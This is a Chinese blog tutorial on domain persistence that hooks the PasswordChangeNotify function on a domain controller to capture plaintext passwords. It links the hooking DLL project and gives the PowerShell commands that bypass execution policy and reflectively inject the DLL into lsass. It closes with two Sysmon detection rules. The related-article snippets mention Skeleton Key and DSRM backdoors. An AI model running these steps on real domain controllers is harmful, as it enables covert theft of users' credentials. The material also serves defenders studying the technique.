【域权限维持】-Hook PasswordChangeNotify

最新推荐文章于 2024-07-21 22:43:00 发布
最新推荐文章于 2024-07-21 22:43:00 发布
阅读量214 收藏
点赞数
分类专栏: 域安全-权限维持 文章标签: windows 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617902/article/details/128742803
版权

内存注入,重启恢复

1、原理

在修改域控制器密码时,LSA首先会调用PasswordFileter来检查该密码是否符合复杂性要求,如果密码符合要求,LSA会调用PasswordChangeNotify在系统中同步密码

如果攻击者Hook了该功能,则可以获取用户修改密码时输入的密码明文

函数PasswordChangeNotify存在于rassfm.dll中,该dll可以理解为Remote Access Subauthentication Dll(远程访问子系统认证),只存在于Server系统中。可以利用dumpbin查看rassfm.dll导出函数来验证

#dumpbin可以借助VS开发人员命令提示,因为只有winserver上存在该文件,需要先将dll文件导出
dumpbin /exports c:\windows\system32\rassfm.dll

在这里插入图片描述

2、生成DLL文件
项目地址: https://github.com/clymb3r/Misc-Windows-Hacking
需在项目属性中设置为 ”在静态库中使用MFC“

作用:
为PasswordChangeNotify创建一个inline Hook,将初始函数重定向到PasswordChangeNotifyHook
在PasswordChangeNotifyHook中实现记录密码的操作,然后重新将控制权交给PasswordChangeNotify

在这里插入图片描述

在这里插入图片描述

3、利用反射注入加载DLL
项目地址: https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1

Set-ExecutionPolicy bypass
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass

在这里插入图片描述

在这里插入图片描述

4、效果

当在被注入的机器上(此处是域控)修改密码时,所有的密码修改操作都会被记录。不管是调用Ctrl+Alt +Delete 还是使用AD用户和计算机功能修改密码
在这里插入图片描述

5、规则

sysmon文件创建,父进程是lsass
sysmon远程线程注入,注入的目的进程是lsass,且注入的是无功能无模块的

注:此文章参考了很多的网络上的其他文章!!!

Getuid
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透——Hook PasswordChangeNotify
weixin_33682790的博客
03-08 137
三好学生 · 2016/03/21 10:300x00 前言在之前的文章中介绍了两种维持权限的方法——SSP和Skeleton Key,这两种方法均需要借助Mimikatz来实现,或多或少存在一些不足,所以这次接着介绍一个更加隐蔽且不需要使用Mimikatz的后门方法——Hook PasswordChangeNotify.0x01 简介Hook PasswordChangeNotify这个概念...
权限维持控后门&SSP&HOOK&DSRM&SID&万能钥匙
今天是几号的博客
04-09 1016
攻防实战中,靶机很难会重启,攻击者重启的话风险过大,因此可以在靶机上把两个方法相互结合起来使用效果比较好,尝试利用把生成的日志密码文件发送到内网被控机器或者临时邮箱。DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows环境中控制器的安全模式启动选项。控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在环境出现故障时还原、修复、重建活动目录数据库。
学习笔记-权限维持
人饭子的博客
10-30 619
权限维持 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 web webshell webshell 管理工具 webshell 爆破 无字母数字 webshell 无文件 webshell 中间件 win 后门用户 MSF权限维持 权限维持技巧 痕迹清理 AD持久化 组策略 Hook_Passw...
[内网渗透]—权限维持
Sentiment的博客
12-16 897
当拿到权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入控制器的 lsass.exe 进程,这样会在内的所有账号中添加一个 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。PS:由于注入到lsass.exe进程中,所以每次关机后就不存在了,但一般在真正的环境中,控在很长一段时间内是不会重启的,因此可以作为权限维持的一种方式。
emqx-lua-hook:EMQ X钩钩
02-03
在emqx-lua-hook-master文件中,可能包含了以下内容: 1. `src/` 目录:存放插件的Erlang源代码,其中可能有加载和管理Lua脚本的模块。 2. `priv/` 目录:存放Lua脚本,这些脚本会被插件加载并在适当的时候执行。 3...
ast-hook用于js逆向根据参数值快速定位到生成加密参数位置
05-04
`ast-hook`工具就是针对这种情况设计的,它专注于帮助开发者在JavaScript代码中快速定位到特定参数值的生成位置,特别是涉及到加密参数的场景。本文将详细探讨`ast-hook`的工作原理、使用方法以及它在js逆向工程中的...
Ajax-hook:拦截由XMLHttpRequest发出的浏览器的AJAX请求
01-30
阿贾克斯钩原理解析: : 简介Ajax-hook是一个精巧的用于拦截浏览器XMLHttpRequest的库,它可以在XMLHttpRequest对象发起请求之前和接收响应内容之后获得处理权。通过它您可以在对请求和响应进行一些预处理。更新记录...
react-modal-hook:使用React Hooks来处理模态的语法糖
05-02
npm install --save react-modal-hook 用法 使用ModalProvider为您的应用程序提供模态上下文: import React from "react" ; import ReactDOM from "react-dom" ; import { ModalProvider } from "react-modal-hook...
request-hook.zip
03-23
《Request-Hook:在Chrome DevTools中高效调试网络请求》 在现代Web开发中,调试网络请求是一项必不可少的任务。Request-Hook是一个强大的工具,专为Chrome DevTools设计,旨在帮助开发者更有效地定位并理解...
Java小技能:多级组织机构排序并返回树结构(包含每个层级的子节点和业务数据集合)
iOS逆向与安全
07-17 3399
包含每个层级的子节点和业务数据集合。
Collections.unmodifiableList
我这个代码你能看懂吗?
07-17 502
以上方法都可以用来复制一个List,具体选择哪种方法取决于你的需求和使用场景。如果你需要一个简单的、快速的复制,可以使用ArrayList构造函数或addAll方法。如果你需要更灵活的操作,可以考虑使用stream和。
FastAPI 学习之路(五十九)封装统一的json返回处理工具
mr~li的博客
07-18 361
在本篇文章之前的接口,我们每个接口异常返回的数据格式都不一样,处理起来也没有那么方便,因此我们可以封装一个统一的json。改造后,我们的返回消息,可以自定义code,message,data。接下来我们再次改造下我们的新建用户的接口。把代码统一放到common下面的json_tools.py里面,我们在接口返回的时候调用。这样我们就完成了统一接口响应处理,后续我们可以在所有的接口中使用。我们看下修改后的用户返回。我们看下处理后的效果。我们看创建重复的返回。
SpringBoot源码(1)ApplicationContext和BeanFactory
weixin_43823462的博客
07-21 480
SpringBoot源码之ApplicationContext和BeanFactory
百日筑基第二十七天-Java8 stream流常用操作
最新发布
qq_45477639的博客
07-21 602
除了使用Collectors提供了toMap,toList等方法之外,我们还可以自定义Collection的数据结构收集//用LinkedList收集//用TreeSet收集。
JAVA8专题-Stream流操作详解
逆天-逍遥哥哥的博客
07-17 1576
JAVA8专题-Stream流操作详解
CmakeLists
qq_33089547的博客
07-17 389
如果使用的静态库, libcalc.a 可被打包到生成的可执行文件当中,动态库里面的数据不会打包到可执行文件里面,当程序一启动,可执行文件和静态库都会被加载到内存中,但是动态库不会,动态库只是执行到的时候才会被加载到内存中。CMAKE_CURRENT_SOURCE_DIR执行cmake时后面携带的路径 CMakeLists.txt对应的路径。PROJECT_SOURCE_DIR:执行cmake时后面携带的路径 CMakeLists.txt对应的路径。发布给客户需要给include 和库文件。
【STL详解 —— map和set的使用】
jokr_的博客
07-17 993
set是按照一定次序存储元素的容器。默认情况下,std::set 使用 std::less 作为比较函数,这意味着它会使用小于运算符(
【C++11】(lambda)
2301_78636079的博客
07-17 991
C++11 lambda
iconv-hook
08-12
iconv-hook 是一个用于字符编码转换的钩子库。钩子函数是一种在程序执行期间被调用的函数,可以用于在特定事件发生时执行一些额外的操作。 在编码转换过程中,iconv-hook 可以用于拦截和修改转换操作。它提供了一种机制,允许用户自定义编码转换的行为。通过使用 iconv-hook,你可以实现自定义的字符编码转换逻辑,例如字符集转换、字符过滤或字符替换等。 iconv-hook 库通常与 iconv 库一起使用,后者是一个常用的字符编码转换库。通过在 iconv 函数调用之前设置 iconv-hook 的钩子函数,可以在编码转换过程中对数据进行修改或者添加自定义逻辑。 需要注意的是,iconv-hook 是一个第三方库,并不是标准的 C 库或者操作系统提供的功能。你可以在互联网上搜索相关资源来获取更多关于 iconv-hook 的详细信息和使用示例。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值